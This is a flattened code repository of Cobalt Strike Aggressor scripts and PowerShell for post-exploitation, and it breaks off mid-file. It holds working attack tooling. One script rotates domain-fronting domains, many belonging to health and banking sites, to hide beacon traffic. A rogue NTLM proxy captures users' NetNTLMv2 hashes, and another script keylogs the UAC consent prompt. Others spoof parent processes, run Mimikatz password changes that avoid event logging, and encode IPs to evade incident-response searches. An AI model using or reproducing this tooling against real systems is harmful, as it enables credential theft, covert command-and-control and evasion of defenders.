├── .gitignore ├── Blacklist.cna ├── HAMMERTHROW.cna ├── Invoke-CredLeak.ps1 ├── Invoke-Vnc.ps1 ├── README.md ├── auto-keylog-consent.cna ├── auto-prepenv.cna ├── credleak.cna ├── http.cna ├── mimikatz_addons.cna ├── ping.cna ├── portfwd.cna ├── pushover-ng.cna ├── pushover.cna ├── test.cna ├── virustotal-ng.cna └── vnc-psh.cna /.gitignore: -------------------------------------------------------------------------------- 1 | pushover.cna 2 | virustotal.cna -------------------------------------------------------------------------------- /Blacklist.cna: -------------------------------------------------------------------------------- 1 | # Blacklist.cna 2 | # Author: Vincent Yiu @vysecurity 3 | # Not responsible for you losing shells, check the blacklists before using. 4 | 5 | global('@blacklist'); 6 | 7 | #$blacklist_pc = @("JOHN-PC", "TEQUILABOOMBOOM", "ANTONY-PC", "XFIIP-PC", "HOME-OFF-D5F0AC"); 8 | #$blacklist_user = @(); 9 | 10 | $blacklist = @( 11 | 12 | @("John *","JOHN-PC"), 13 | @("janettdoe *","TEQUILABOOMBOOM"), 14 | @("Antony *","ANTONY-PC"), 15 | @("xfIIp *","XFIIP-PC"), 16 | @("Dave *","HOME-OFF-D5F0AC") 17 | 18 | ); 19 | 20 | on beacon_initial{ 21 | # $1 - ID of beacon 22 | # $2 - text of the message 23 | # $3 - time 24 | 25 | $pcname = binfo($1, "computer"); 26 | $username = binfo($1, "user"); 27 | 28 | if (@($username, $pcname) isin $blacklist){ 29 | blog("[!] Blacklisted Pair: $username, $pcname"); 30 | blog("Exiting..."); 31 | bexit($1); 32 | blog("Removing..."); 33 | bremove($1); 34 | } 35 | 36 | } 37 | 38 | sub add_blacklist{ 39 | # $1 = beacon_id 40 | foreach $beacon ($1){ 41 | #elog($beacon); 42 | $pair = @(binfo($beacon, "user"), binfo($beacon, "computer")); 43 | if (!exists($pair)){ 44 | blog($beacon, "[*] Adding $pair to blacklist"); 45 | add($blacklist, $pair, -1); 46 | } 47 | else{ 48 | blog($beacon, "[!] $pair already exists in blacklist"); 49 | } 50 | } 51 | show_blacklist($beacon); 52 | } 53 | 54 | sub remove_blacklist{ 55 | # $1 = beacon_id 56 | foreach $beacon ($1){ 57 | $pair = @(binfo($beacon, "user"), binfo($beacon, "computer")); 58 | if (exists($pair)){ 59 | blog($beacon, "[*] Removing $pair from blacklist"); 60 | remove($blacklist, $pair); 61 | } 62 | else{ 63 | blog($beacon, "[!] $pair does not exist in blacklist"); 64 | } 65 | } 66 | show_blacklist($beacon); 67 | } 68 | 69 | sub show_blacklist{ 70 | 71 | blog($1, "========================"); 72 | if (size($1) <= 0){ 73 | blog($1, "[!] Empty Blacklist"); 74 | } 75 | foreach $pair ($blacklist){ 76 | blog($1, "Blacklist: $pair"); 77 | } 78 | blog($1, "========================"); 79 | } 80 | 81 | popup beacon_bottom { 82 | menu "Blacklist"{ 83 | item "Add to Blacklist" { 84 | add_blacklist($1); 85 | } 86 | item "Remove from Blacklist" { 87 | remove_blacklist($1); 88 | } 89 | item "Show Blacklist" { 90 | show_blacklist($1); 91 | } 92 | } 93 | } 94 | 95 | sub exists{ 96 | # Check if blacklist already exists 97 | # @("user", "computer"); 98 | if ($1 in $blacklist){ 99 | return true; 100 | } 101 | else{ 102 | return false; 103 | } 104 | } 105 | 106 | 107 | alias blacklist-add { 108 | # $1 = beacon_id 109 | add_blacklist(@($1)); 110 | } 111 | 112 | alias blacklist-remove { 113 | # $1 = beacon_id 114 | remove_blacklist(@($1)); 115 | } 116 | 117 | alias blacklist-show { 118 | show_blacklist($1); 119 | } 120 | 121 | -------------------------------------------------------------------------------- /HAMMERTHROW.cna: -------------------------------------------------------------------------------- 1 | # HAMMERTHROW 2 | # Rotates domain fronting domains for beacon HTTPS listener every 5 minutes. 3 | # This ensures that your beacon domains are not limited to one domain, and is actively changing to avoid new egress beacons from being detected. 4 | 5 | # Quiet mode, no logging in event log 6 | $quiet = $False; 7 | 8 | global('@domains'); 9 | 10 | # Set a domain list you want to use here 11 | @domains = @("abmail.itriagehealth.com","about.itriagehealth.com","app.dosehealthcare.com","appmanager.linkhealth.com","appmanager-test.linkhealth.com","appmanager-stage.linkhealth.com","assets.healthcare.com","assets.stg.healthcare.com","assets.verticalhealth.net","assets.westfieldhealth.com","besthealth.save.ca","bhn.burdhealth.com","careers.gdhealth.com","cdn1.healthians.com","cdn2.beyondhealthy.ca","cdn2.healthians.com","cdn3.beyondhealthy.ca","cdn3.healthians.com","cdn4.healthians.com","cdn.ahchealthenews.com","cdn.ahealthypassion.com","cdn.beyondhealthy.ca","cdn.confer.health","cdn.crickethealth.com","cdn-css.health.com","cdn.healthcare.com","cdn.healthcare.se","cdn.healthguru.com","cdn.healthscion.com","cdn.healthyplace.com","cdn.healthytraditions.com","cdn-img.health.com","cdn-js.health.com","cdn.kivihealth.com","cdn.passporthealthglobal.com","cdn.passporthealthusa.com","cdn.patientfocus.myhealthfeed.com","cdn.smart-monitor.myhealthfeed.com","cdn-stage.linkhealth.com","cdn.universityhealthnews.com","cf.goziohealth.com","cf.healthcare.com","claims.linkhealth.com","client.healthiestyou.com","connect.uclahealth.org","demo.healthjoiner.com","desktop.healthchat.md","developer.linkhealth.com","developer-stage.linkhealth.com","faq.wahealthplanfinder.org","files.kivihealth.com","garciniacambogiaearthshealthie.simplesite.com","go.dosehealthcare.com","healthbeautyexample.upplication.com","health.facty.com","healthelife.healtheintent.com","healthhub.medibankhealth.com.au","healthpartneradvantage.com","health.tvbs.com.tw","healthy-mom-daily.com","healthymatrix.myisagenix.com","hsafacts.healthequity.com","ibmsol.integrahealth.com","icrm-static.hospitals.healthgrades.com","images.eqcohealth.io","images.smarthealth.me","imshealth.e.sparkpost.com","jobs.atlantichealth.org","media-dev.healthination.com","media.elsevierhealth.com.au","media.healthdirect.org.au","media.healthination.com","media.healthiq.com","mednet.uclahealth.org","member.bluezonehealth.co.uk","member.healthiestyou.com","nahis.animalhealthaustralia.com.au","namp.animalhealthaustralia.com.au","new.ccihealth.org","portal.altegrahealth.com","portal.apostrophehealth.com","portal.burdhealth.com","prodstaticcdn.stanfordhealthcare.org","provider.apostrophehealth.com","provider.linkhealth.com","provider-stage.linkhealth.com","requestinfo.publichealthonline.gwu.edu","resources.static.evaliahealth.com","secure.menshealth.com","secure.womenshealthmag.com","social.drivemyhealth.com","sponsored.health.com","ssl.sociohealth.co.jp","staging-about.itriagehealth.com","static.healthcare.com","static.healthination.com","stg-images.eqcohealth.io","student.healthiestyou.com","styles.smarthealth.me","subscription-assets.health.com","tiads.health.com","tokensale.simplyvitalhealth.com","uat.healthepetsnow.com","uatstaticcdn.stanfordhealthcare.org","ushealthadvisors.vivialsite.net","wacohealthandwellness.smugmug.com","www.acadiahealthcarecareers.com","www.africahealthexhibition.com","www.arabhealthonline.com","www.baldurhealthcare.com","www.buildinghealthcare-exhibition.com","www.careersatmainehealth.org","www.drivemyhealth.com","www.h1healthcare.com","www.healthandsafety-jobs.co.uk","www.health.com","www.healthbeckon.com","www.healthelivingfilm.com","www.healthevoices16.com","www.healthcombined.com","www.healthrecruitmentfair.com","www.healthystockport.co.uk","www.ihealthkonnect.com","www.lakelandbehavioralhealth.com","www.lusciniahealth.com","www.manateehealthcaresystem.com","www.mangohealth.com","www.massivehealth.com","www.medstarhealthjobs.org","www.melonhealth.com","www.peacehealth.org","www.platformqhealth.com","www.saudihealthexhibition.com","www.sesamehealthyplay.org","www.sociohealth.co.jp","www.soleohealth.com","www.southtexashealthsystem.com","www.swhealthcaresystem.com","www.teamhealth.com","www.uclahealthcareers.org","www.usanahealth.net","www.valleyhealthsystemlv.com","admin.interbankbenefit.pe","agl.medibank.com.au","arkansas.protectmybank.com","assets.nieuwsbank.nl","bank.coveredsec.com","bankia-mobile.brandcrumb.com","bank.smugmug.com","bebetter.medibank.com.au","beta.cdn.bankersalmanac.com","brokercdn2.pnbank.info","brokercdn5.pnbank.info","careers.bankofireland.com","careers.cobank.com","cdn.amarbank.co.id","cdn.bankersalmanac.com","cdn.bankforeclosuressale.com","cdn.banksalad.com","cdn.foodbank.io","cdn.nieuwsbank.nl","cdn.southbankresearch.com","cdn.spankbank.io","cem2.lloydsbank.co.uk","certification.protectmybank.com","cf.sports.mb.softbank.jp","content-medibank.ritualize.com","corporate.medibank.com.au","databank.501st.com","dbanksphotography.smugmug.com","developer.softbankrobotics.com","dev.libertybank.net","docs.selfbank.es","donbanka.smugmug.com","duxyphotobank.smugmug.com","ebanking.ekuantia.es","fu11.my.softbank.jp","healthhub.medibankhealth.com.au","homebanking.hiway.org","images.spankbank.io","irishlab.cytobank.org","ite.verify.kiwibank.co.nz","leftbankhome.smugmug.com","martin-windebank.smugmug.com","members.medibank.com.au","merchants.firstbanks.com","merch.bankofamerica.com","mtbank.cdn.online-trading-solutions.com","myautoloan.broadway.bank","myburbank.smugmug.com","oncard.zionsbank.com","p2bkunisbank.simplesite.com","ppd-developer.softbankrobotics.com","production-cdn2.patternbank.com","production-cdn1.patternbank.com","production-cdn.patternbank.com","publicdemobankingsample.locationlandingpages.com","reh2-developer.softbankrobotics.com","service.protectmybank.com","showmeopportunities.bankofireland.com","ssl.clickbank.net","stage-my.softbankrobotics.com","stage-store.softbankrobotics.com","stage-www.softbankrobotics.com","static.interbankbenefit.pe","static.medibank.com.au","st.fu11.my.softbank.jp","tedleeeubanks.smugmug.com","test-cdn.amarbank.co.id","verify.kiwibank.co.nz","vip.medibank.com.au","wc.banklotus.com.tw","wc.csbank.com.tw","wc.ksbank.com.tw","wc.ucbank.com.tw","www.bankenberatungszentrum.ch","www.bankmelb.com.au","www.bankofmelbourne.com","www.bankoftampa.com","www.bankofmelbourne.com.au","www.banksa.com.au","www.banksrum.com","www.buddybank.com","www.columbiabankmerchantservices.com","www.greatsouthernbankpaymentsolutions.com","www.interbankbenefit.pe","www.kbankegirls.com","www.libertybank.net","www.medibank.com.au","www.melbank.com","www.nextbank.ph","www.republicbankmerchantservices.com","www.safetydatabank.jp","www.softbankrobotics.com","www.starbanksadventure.com","www.websterbankmerchantservices.com","www.worldbank.org","1706bbc01.adambank.com","100500.rocketbank.ru","admin-staging.coloradok12financialtransparency.com","blog.financialengines.com","branches.onemainfinancial.com","calculators.evenfinancial.com","careers.snifinancial.com","cla.evenfinancial.com","corp.financialengines.com","financialaid.wvu.edu","financialbuilders.truecar.com","financialmarketstoolkit.cliffordchance.com","financialpost.scribblelive.com","financialservices.wvu.edu","financials.morningstar.com","i.financialengines.com","local.gmfinancial.com","m-ink.etradefinancial.com","news.efinancialcareers.com","news.pilotaws.efinancialcareers.com","partnerpage.evenfinancial.com","webstore.efinancialcareers.com","widgets.efinancialcareers.com","widgets.pilotaws.efinancialcareers.com","www.financialedufcu.com","www.paccarfinancial.com.au","www.retailfinancialcareers.com","www.yesplanfinancial.ca","accreditation.wvu.edu","anhs.cusdcreditrecovery.com","api.creditsafebci.com","bridges.cusdcreditrecovery.com","ca.creditcards.com","calprep.cusdcreditrecovery.com","canada.creditcards.com","cdn.creditcards.com","creditunion1.truecar.com","cvhs.cusdcreditrecovery.com","data.kanzen-creditcard.com","dhhs.cusdcreditrecovery.com","image.creditseva.com","images.creditcardcompare.com.au","lab-uat.credit-suisse.com","schs.cusdcreditrecovery.com","shs.cusdcreditrecovery.com","sjhhs.cusdcreditrecovery.com","ths.cusdcreditrecovery.com"); 12 | 13 | $size = size(@domains); 14 | 15 | # Set how many domains you want to use for beaconing. Don't put too many at once 16 | $num = 3; 17 | $start = $True; 18 | 19 | # heartbeat_10s 20 | # heartbeat_5m 21 | # Up to you :) 22 | 23 | on heartbeat_10s { 24 | if ($start == $True){ 25 | @cactus = @(); 26 | for ($a = 0; $a < $num; $a++){ 27 | # get a random domain from the list 28 | $dom = rand(@domains); 29 | 30 | # if it exists, keep generating a random one until we get a unique one not already on the list. 31 | if ($dom in @cactus){ 32 | while($dom in @cactus){ 33 | $dom = rand(@domains); 34 | } 35 | } 36 | # Add to cactusfront 37 | add(@cactus, $dom); 38 | } 39 | 40 | if ($quiet == $False){ 41 | elog("\cB[+] HAMMERTHROW rotating domains:"); 42 | } 43 | 44 | # Lucky first one will be the stager 45 | if ($quiet == $False){ 46 | elog(" \cB[STAGER] \c9" . @cactus[0]); 47 | } 48 | 49 | # Rest will be the beaconing domains 50 | $domStr = ""; 51 | for ($a = 1; $a < $num; $a++){ 52 | $domStr = $domStr . @cactus[$a] . ","; 53 | } 54 | $domStr = substr($domStr, 0, -1); 55 | if ($quiet == $False){ 56 | elog(" \cB[BEACON] \c9" . $domStr); 57 | } 58 | } 59 | 60 | $listener = ""; 61 | $type = ""; 62 | foreach $name (listeners()) { 63 | $a = listener_describe($name); 64 | $b = indexOf($a, "beacon_https/reverse_https", 0); 65 | $c = indexOf($a, "beacon_http/reverse_http", 0); 66 | 67 | 68 | 69 | if ($b || $c){ 70 | $listener = $name; 71 | if ($b){ 72 | $type = "https"; 73 | } 74 | else{ 75 | $type = "http"; 76 | } 77 | 78 | $portpos = indexOf($a, ":", -10); 79 | $port = substr($a, $portpos); 80 | 81 | $portpos = indexOf($port, ")"); 82 | $port = substr($port, 0, $portpos); 83 | 84 | $port = strrep($port, ":", ""); 85 | } 86 | } 87 | 88 | 89 | if ($listener -eq ""){ 90 | elog("\c4[ERROR] Cannot discover egress listener, please restart agent when an egress listener is created over HTTP or HTTPS"); 91 | } 92 | else{ 93 | if ($quiet == $False){ 94 | elog("\cB[*] Detected listener name: \c9 " . $listener . " ( $+ $type $+ : $+ $port $+ ) \r\n"); 95 | } 96 | } 97 | 98 | # delete existing listener 99 | # listener_delete($listener); 100 | 101 | # create new listener 102 | # $1 = name 103 | # $2 = payload type 104 | # $3 = host 105 | # $4 = port 106 | # $5 = beacons 107 | if ($type == "https"){ 108 | listener_create($listener, "windows/beacon_https/reverse_https", @cactus[0], $port, $domStr); 109 | } 110 | else{ 111 | listener_create($listener, "windows/beacon_http/reverse_http", @cactus[0], $port, $domStr); 112 | } 113 | 114 | } 115 | 116 | 117 | 118 | on ready { 119 | elog("\HAMMERTHROW rotations are now initiated"); 120 | $start = $True; 121 | if ($num > $size){ 122 | elog("\c4[ERROR] The selection number of domains is larger than the number of domains supplied in the list"); 123 | $start = $False; 124 | } 125 | 126 | if ($num < 2){ 127 | elog("\c4[ERROR] We need at least a total list of 2 domains, one for the stager, and one for beaconing"); 128 | $start = $False; 129 | } 130 | 131 | # 132 | 133 | elog("\c8[+] A total of " . $size . " domains loaded"); 134 | 135 | } -------------------------------------------------------------------------------- /Invoke-CredLeak.ps1: -------------------------------------------------------------------------------- 1 | # Original code by @leftp 2 | # https://gist.github.com/leftp/a3330f13ac55f584239baa68a3bb88f2 3 | 4 | function Invoke-ProxyServer { 5 | 6 | <# 7 | 8 | .SYNOPSIS 9 | 10 | This function starts the proxy server on 8080 11 | 12 | .DESCRIPTION 13 | 14 | This function starts the proxy server on 8080 15 | 16 | 17 | #> 18 | 19 | Param( 20 | 21 | 22 | ) 23 | 24 | $code = "f132ae278ad7f7a0" 25 | $e = "Access Denied" 26 | $e2 = "" 27 | 28 | $nbdomainname = strtonullspacedhex("NODOMAIN") 29 | $dnsdomainname = strtonullspacedhex("NODOMAIN.COM") 30 | $computername = strtonullspacedhex("NO") 31 | $dnscomputername = strtonullspacedhex("NO.NODOMAIN.COM") 32 | 33 | $nbdomainnamelen = strlentohexint $nbdomainname 4 34 | $computernamelen = strlentohexint $computername 4 35 | $dnsdomainnamelen = strlentohexint $dnsdomainname 4 36 | $dnscomputernamelen = strlentohexint $dnscomputername 4 37 | 38 | $targetinfo = "0200"+$nbdomainnamelen+$nbdomainname+"0100"+$computernamelen+$computername+"0400"+$dnsdomainnamelen+$dnsdomainname+"0300"+$dnscomputernamelen+$dnscomputername+"0500"+$dnsdomainnamelen+$dnsdomainname+"0000"+"0000" 39 | 40 | $t1=hextoint "38000000" 41 | $t2=strlentohexint $nbdomainname 4 42 | $t2=hextoint $t2 43 | $t=($t1+$t2) 44 | $targetinfooffset = strtohexint $t 8 45 | 46 | $targetinfolen = strlentohexint $targetinfo 4 47 | $hexcode = "4e544c4d53535000"+"02000000"+$nbdomainnamelen+$nbdomainnamelen+"38000000"+"958289e2"+$code+"0000000000000000"+$targetinfolen+$targetinfolen+$targetinfooffset+"0000000000000000"+$nbdomainname+$targetinfo 48 | 49 | $Encoding = new-object system.text.asciiencoding; 50 | $Buffer=new-object system.byte[] 1024; 51 | $endpoint = new-object System.Net.IPEndPoint ([system.net.ipaddress]::loopback, 8080) 52 | $listener = new-object System.Net.Sockets.TcpListener $endpoint 53 | $listener.start() 54 | while ($true) 55 | { 56 | $client = $listener.AcceptTcpClient() 57 | $Stream = $client.GetStream() 58 | $reader = New-Object System.IO.StreamReader $Stream 59 | $writer = New-Object System.IO.StreamWriter $Stream 60 | #While($client.connected) 61 | #{ 62 | $Result="" 63 | While($Stream.DataAvailable) 64 | { 65 | $Read=$Stream.Read($Buffer,0,1024); 66 | $Result+=$Encoding.GetString($Buffer, 0, $Read) 67 | #$Result+=$Buffer[0..$Read] 68 | } 69 | if ($Result -ne "") 70 | { 71 | $Result 72 | if ($Result -like "CONNECT*" -or $Result -like "GET*") 73 | { 74 | if ($Result -like "*Proxy-Authorization:*") 75 | { 76 | $b=($Result.split("`r`n") | Select-String -Pattern ("Proxy-Authorization")).tostring() 77 | $b=$b.split(" ")[$b.split(" ").length-1].split("`r`n")[0] 78 | $b=[System.Convert]::FromBase64String($b) -join " " 79 | $b=ByteArray-to-string $b 80 | if ($b.substring(8*2,4*2) -eq "01000000") 81 | { 82 | $t=string-to-bytearray $hexcode 83 | $t=[System.Convert]::ToBase64String($t) 84 | $res="HTTP/1.1 407 Proxy Authorization Required`r`nProxy-Authenticate: Negotiate " + $t + "`r`nContent-Type: text/html`r`nContent-Length: " + $e.length.tostring() + "`r`n`r`n" + $e 85 | $writer.write($res) 86 | $writer.flush() 87 | } 88 | if ($b.substring(8*2,4*2) -eq "03000000") 89 | { 90 | $offset_NTLMresponse = hextoint $b.substring(24*2,4*2) 91 | $length_NTLMresponse = hextoint $b.substring(20*2,2*2) 92 | $NTProofStr = $b.substring($offset_NTLMresponse*2,16*2) 93 | $NTLMresponse = $b.substring(($offset_NTLMresponse*2)+$NTProofStr.length,$length_NTLMresponse*2-$NTProofStr.length) 94 | $offset_domain = hextoint $b.substring(32*2,4*2) 95 | $length_domain = hextoint $b.substring(28*2,2*2) 96 | $offset_user = hextoint $b.substring(40*2,4*2) 97 | $length_user = hextoint $b.substring(36*2,2*2) 98 | $domain = $b.substring($offset_domain*2,$length_domain*2) 99 | $user = $b.substring($offset_user*2,$length_user*2) 100 | $user=hextostr $user 101 | $domain= hextostr $domain 102 | write-host "" 103 | write-host "" 104 | write-host $user"::"$domain":"$code":"$NTProofStr":"$NTLMresponse 105 | write-host "" 106 | write-host "" 107 | $res="HTTP/1.1 200 OK`r`nContent-Type: text/html`r`nContent-Length: " + $e2.length.tostring() + "`r`n`r`n" + $e2 108 | $writer.write($res) 109 | $writer.flush() 110 | } 111 | } 112 | else 113 | { 114 | $res="HTTP/1.1 407 Proxy Authorization Required`r`nProxy-Authenticate: Negotiate`r`nProxy-Authenticate: NTLM`r`nContent-Type: text/html`r`nContent-Length: " + $e.length.tostring() + "`r`n`r`n" + $e 115 | $writer.write($res) 116 | $writer.flush() 117 | } 118 | } 119 | } 120 | #} 121 | $client.Dispose() 122 | $writer.Dispose() 123 | $reader.Dispose() 124 | $stream.Dispose() 125 | } 126 | $listener.stop() 127 | 128 | } 129 | 130 | function Invoke-CredLeak { 131 | 132 | <# 133 | 134 | .SYNOPSIS 135 | 136 | This function starts the proxy server on 8080 137 | 138 | .DESCRIPTION 139 | 140 | This function starts the proxy server on 8080 141 | 142 | 143 | #> 144 | 145 | Param( 146 | 147 | 148 | ) 149 | 150 | $wc = New-Object System.Net.WebClient 151 | $WebProxy = New-Object System.Net.WebProxy("http://127.0.0.1:8080",$true) 152 | $WebProxy.UseDefaultCredentials = $true 153 | $wc.Proxy = $WebProxy 154 | $wc.DownloadString("http://www.google.com") 155 | 156 | } 157 | 158 | 159 | 160 | function String-to-ByteArray ($String) 161 | { 162 | $ByteArray=@() 163 | For ( $i = 0; $i -lt ($String.Length/2); $i++ ) 164 | { 165 | $Chars=$String.Substring($i*2,2) 166 | $Byte=[Byte] "0x$Chars" 167 | $ByteArray+=$Byte 168 | } 169 | Return $ByteArray 170 | } 171 | 172 | function ByteArray-to-String ($ByteArray) 173 | { 174 | ForEach ( $Byte In $ByteArray.ToString().Split(" ") ) 175 | { 176 | $String="$String"+[Convert]::ToString($Byte,16).ToUpper().PadLeft(2,"0") 177 | } 178 | Return $String 179 | } 180 | 181 | function strtohex ($str) 182 | { 183 | $b=$str.ToCharArray(); 184 | Foreach ($element in $b) 185 | { 186 | $c=$c+[System.String]::Format("{0:X}",[System.Convert]::ToUInt32($element)) 187 | } 188 | return $c 189 | } 190 | 191 | function hextostr ($str) 192 | { 193 | $temp="" 194 | for ($i = 0; $i -lt $str.length; $i += 2) 195 | { 196 | $temp1=[convert]::Toint32($str.substring($i,2),16) 197 | if ($temp1 -ne 0) 198 | { 199 | $temp=$temp+[char]$temp1 200 | } 201 | } 202 | return $temp 203 | } 204 | 205 | function strtonullspacedhex ($str) 206 | { 207 | $b=$str.ToCharArray(); 208 | Foreach ($element in $b) 209 | { 210 | $c=$c+[System.String]::Format("{0:X}",[System.Convert]::ToUInt32($element))+"00" 211 | } 212 | return $c 213 | } 214 | 215 | function strtohexint ($str,$length) 216 | { 217 | $tmp="{0:X0}" -f $str 218 | if ($tmp.length -eq 1) 219 | { 220 | $tmp="0"+$tmp 221 | } 222 | if ($length-$tmp.length -gt 0) 223 | { 224 | $tmp=$tmp+"0"*($length-$tmp.length) 225 | } 226 | return $tmp 227 | } 228 | 229 | function strlentohexint ($str,$length) 230 | { 231 | $tmp="{0:X0}" -f ($str.length/2) 232 | if ($tmp.length -eq 1) 233 | { 234 | $tmp="0"+$tmp 235 | } 236 | $tmp=$tmp+"0"*($length-$tmp.length) 237 | return $tmp 238 | } 239 | 240 | Function hextoint ($h) { 241 | $string="" 242 | For ( $i = 0; $i -lt ($h.Length/2); $i++ ) { 243 | $string=$string+$h.substring(($h.length)-($i*2)-2,2) 244 | } 245 | Return [convert]::Toint32($string,16) 246 | } 247 | 248 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Contains a bunch of CobaltStrike Aggressor Scripts 2 | 3 | Ping: Converts an IP address to Hex equivalent and uses ping command. Prevents IR regex for IP addresses. 4 | 5 | Auto-prepenv: Automatically preps the environment on initial beacon 6 | 7 | VNC-psh: Runs a VNC server on the target 8 | 9 | Credleak: Starts a proxy server on localhost 8080 and connects to it to leak the NetNTLMv2 hash. 10 | 11 | -------------------------------------------------------------------------------- /auto-keylog-consent.cna: -------------------------------------------------------------------------------- 1 | 2 | sub keylognow { 3 | bps($1, lambda({ 4 | local('$pid $name $entry'); 5 | foreach $entry (split("\n", $2)) { 6 | ($name, $null, $pid, $arch) = split("\\s+", $entry); 7 | if ($name eq "consent.exe") { 8 | [$callback: $1, $pid, $arch]; 9 | } 10 | } 11 | }, $callback => $2)); 12 | } 13 | 14 | alias keylog-consent { 15 | btask($1, "Tasked Beacon to find consent.exe and keylog it"); 16 | keylognow($1, { 17 | bkeylogger($1, $2, $3); 18 | }); 19 | } -------------------------------------------------------------------------------- /auto-prepenv.cna: -------------------------------------------------------------------------------- 1 | # Raphael Mudge released code to search for explorer.exe and set it as a Parent PID. 2 | # https://www.cobaltstrike.com/aggressor-script/functions.html#bppid 3 | # 4 | # Just add on_initial to make it do it on arrival. 5 | 6 | # getexplorerpid($bid, &callback); 7 | sub getexplorerpid { 8 | bps($1, lambda({ 9 | local('$pid $name $entry'); 10 | foreach $entry (split("\n", $2)) { 11 | ($name, $null, $pid) = split("\\s+", $entry); 12 | if ($name eq "explorer.exe") { 13 | [$callback: $1, $pid]; 14 | } 15 | } 16 | }, $callback => $2)); 17 | } 18 | 19 | alias prepenv { 20 | btask($1, "Tasked Beacon to find explorer.exe and make it the PPID"); 21 | getexplorerpid($1, { 22 | bppid($1, $2); 23 | }); 24 | } 25 | 26 | on beacon_initial { 27 | 28 | fireAlias($1, "prepenv"); 29 | 30 | } -------------------------------------------------------------------------------- /credleak.cna: -------------------------------------------------------------------------------- 1 | # Original idea and code by @leftp 2 | # https://gist.github.com/leftp/a3330f13ac55f584239baa68a3bb88f2 3 | # 4 | # I took the code and modified it into a usable form. 5 | # Author: @vysecurity 6 | 7 | alias credleak { 8 | btask($1, "Starting Proxy server on 8080"); 9 | bpowershell_import($1, script_resource("Invoke-CredLeak.ps1")); 10 | bpowershell($1, "Invoke-ProxyServer"); 11 | btask($1, "Connecting to proxy in attempt to leak hash"); 12 | bpowershell($1, "Invoke-CredLeak"); 13 | blog($1, "Kill the job after the hash has been leaked. Do a shell netstat -ano | findstr /i 8080 then kill the process"); 14 | } 15 | 16 | beacon_command_register("credleak", "Starts up a proxy server on 8080 and connects to it to leak NetNTLMv2 hash", 17 | "Syntax: credleak\n" . 18 | "Starts up a proxy server on localhost:8080 and connects to it to leak NetNTLMv2 hash of the low privilege user"); 19 | -------------------------------------------------------------------------------- /http.cna: -------------------------------------------------------------------------------- 1 | import java.io.BufferedReader; 2 | import java.io.DataOutputStream; 3 | import java.io.InputStreamReader; 4 | import java.net.HttpURLConnection; 5 | import java.net.URL; 6 | 7 | alias send { 8 | 9 | $method = "GET"; 10 | $url = "https://www.google.com"; 11 | $body = ""; 12 | 13 | $response = sendhttp($method, $url, $body); 14 | elog($response); 15 | } 16 | 17 | # sendhttp 18 | # GET/POST 19 | # URL 20 | # POST BODY 21 | 22 | sub sendhttp{ 23 | 24 | $method = $1; 25 | $url = $2; 26 | $body = $3 . "\r\n"; 27 | 28 | $USER_AGENT = "Mozilla/5.0"; 29 | 30 | 31 | $urlobj = [new URL: $url]; 32 | 33 | $con = [$urlobj openConnection]; 34 | 35 | [$con setRequestMethod: $method]; 36 | 37 | [$con setRequestProperty: "User-Agent", $USER_AGENT]; 38 | 39 | [$con setDoOutput: true]; 40 | $wr = [new DataOutputStream: [$con getOutputStream]]; 41 | [$wr writeBytes: $body]; 42 | [$wr flush]; 43 | [$wr close]; 44 | 45 | $responseCode = [$con getResponseCode]; 46 | 47 | $in = [new BufferedReader: [new InputStreamReader: [$con getInputStream]]]; 48 | 49 | $inputLine = ""; 50 | 51 | $response = ""; 52 | 53 | $inputLine = [$in readLine]; 54 | $response = $response . $inputLine . "\r\n"; 55 | 56 | while ($inputLine ne ""){ 57 | $inputLine = [$in readLine]; 58 | $response = $response . $inputLine . "\r\n"; 59 | } 60 | 61 | [$in close]; 62 | 63 | return $response; 64 | 65 | } -------------------------------------------------------------------------------- /mimikatz_addons.cna: -------------------------------------------------------------------------------- 1 | # Cobalt Strike Mimikatz Enhancement CNA Addon 2 | # Created by @vysecurity 3 | # 4 | # Credits to @armitagehacker (cobaltstrike) and @gentilkiwi (mimikatz) 5 | 6 | alias password_change { 7 | # $2: Username 8 | # $3: Old hash or password 9 | # $4: New hash or password 10 | # $5: SERVERNAME/DC/Localhost 11 | 12 | $user = $2; 13 | $old = $3; 14 | $new = $4; 15 | $server = $5; 16 | 17 | if ($user && $old && $new){ 18 | $command = "lsadump::changentlm /user:$user"; 19 | 20 | # Check if $old is a hash 21 | if ($old -ismatch '[a-fA-F0-9]{32}'){ 22 | $command += " /oldntlm:$old"; 23 | } 24 | else { 25 | $command += " /oldpassword:$old"; 26 | } 27 | 28 | # Check if new is a hash 29 | if ($new -ismatch '[a-fA-F0-9]{32}'){ 30 | $command += " /newntlm:$new"; 31 | } 32 | else{ 33 | $command += " /newpassword:$new"; 34 | } 35 | 36 | if ($server){ 37 | $command += " /server:$server"; 38 | } 39 | else{ 40 | berror("No server specified, defaulting to localhost."); 41 | } 42 | 43 | prompt_confirm("Are you sure you want to execute?\nCommand: $command", "Confirmation", { 44 | btask($1, "$command"); 45 | bmimikatz($1, "$command"); 46 | }); 47 | 48 | 49 | } 50 | else{ 51 | berror($1,"Missing parameters, you need exactly 4."); 52 | } 53 | } 54 | 55 | beacon_command_register("password_change", "Executes a password change which allows you to change the NTLM password for a given account.", 56 | "Syntax: password_change [SERVER/DC/localhost] [Username] [Known old hash or password] [New hash or password]\n" . 57 | "Uses Mimikatz's password change functionality which allows you to change the NTLM password for a given account without the setpassword event logging.\n". 58 | "Useful for situations where you do not know the cleartext original password so you can change the password quickly and reset the NTLM hash after you're done."); 59 | 60 | 61 | -------------------------------------------------------------------------------- /ping.cna: -------------------------------------------------------------------------------- 1 | # A script to allow you to ping an IP address and it will convert to Hex equivalent 2 | # Concept of IR looking for IP regex in logs by @Nebulator inspired me to write this. 3 | # 4 | # Author: @vysecurity 5 | 6 | alias ping { 7 | # $1 - Self 8 | # $2 - IP 9 | 10 | if ($2){ 11 | $ip = $2; 12 | ($p1,$p2,$p3,$p4) = split("\\.", $ip); 13 | 14 | if ((int($p1) >= 0) && (int($p1) <= 255) && (int($p2) >= 0) && (int($p2) <= 255) && (int($p3) >= 0) && (int($p3) <= 255) && (int($p4) >= 0) && (int($p4) <= 255)){ 15 | # Correct IP at this bit 16 | 17 | $p1h = formatNumber($p1, 10, 16); 18 | $p2h = formatNumber($p2, 10, 16); 19 | $p3h = formatNumber($p3, 10, 16); 20 | $p4h = formatNumber($p4, 10, 16); 21 | 22 | $p1hs = "$p1h"; 23 | $p2hs = "$p2h"; 24 | $p3hs = "$p3h"; 25 | $p4hs = "$p4h"; 26 | 27 | if (strlen($p1hs) == 1){ 28 | $p1hs = "0 $+ $p1hs"; 29 | } 30 | if (strlen($p2hs) == 